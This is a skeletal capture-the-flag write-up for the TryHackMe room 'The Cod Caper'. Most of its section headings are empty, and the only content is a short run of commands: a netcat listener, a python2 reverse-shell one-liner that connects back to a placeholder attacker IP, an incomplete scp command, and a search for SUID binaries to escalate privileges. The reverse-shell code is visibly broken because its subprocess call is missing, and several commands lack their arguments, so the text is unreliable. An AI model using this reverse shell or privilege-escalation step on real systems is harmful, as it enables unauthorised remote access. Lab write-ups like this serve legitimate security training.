Tryhackme:The Cod Caper


Host Enumeration:

Web Enumeration:

Useful flags:

Web Exploitation:

Command Execution:

nc -nvlp 80
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRES",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'


scp pingu@cod:/tmp
chmod +x
find / -perm -u=s -type f 2>/dev/null


Binary-Exploitaion: Manually:

Binary Exploitation: The pwntools way:

Finishing the job:




Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store